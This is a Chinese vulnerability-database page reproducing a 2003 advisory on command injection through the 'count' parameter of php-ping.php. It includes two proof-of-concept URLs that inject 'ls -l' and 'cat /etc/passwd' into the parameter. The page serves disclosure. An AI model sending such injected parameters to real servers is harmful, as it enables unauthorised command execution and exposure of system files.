PHP-ping – ‘Count’ Command Execution

32次阅读
没有评论

PHP-ping – ‘Count’ Command Execution

漏洞ID 1054343 漏洞类型
发布时间 2003-12-29 更新时间 2003-12-29
PHP-ping - 'Count' Command ExecutionCVE编号 N/A
PHP-ping - 'Count' Command ExecutionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23487
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9309/info

It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell
metacharacters via the 'count' parameter of php-ping.php script.

Exploitation would permit a remote attacker to execute arbitrary commands with the privileges of the web server hosting the vulnerable software. 

http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21

相关推荐: PeopleSoft PeopleTools IClient Servlet Arbitrary Code Execution Vulnerability

PeopleSoft PeopleTools IClient Servlet Arbitrary Code Execution Vulnerability 漏洞ID 1099301 漏洞类型 Design Error 发布时间 2003-11-13 更新时间 …

正文完
 0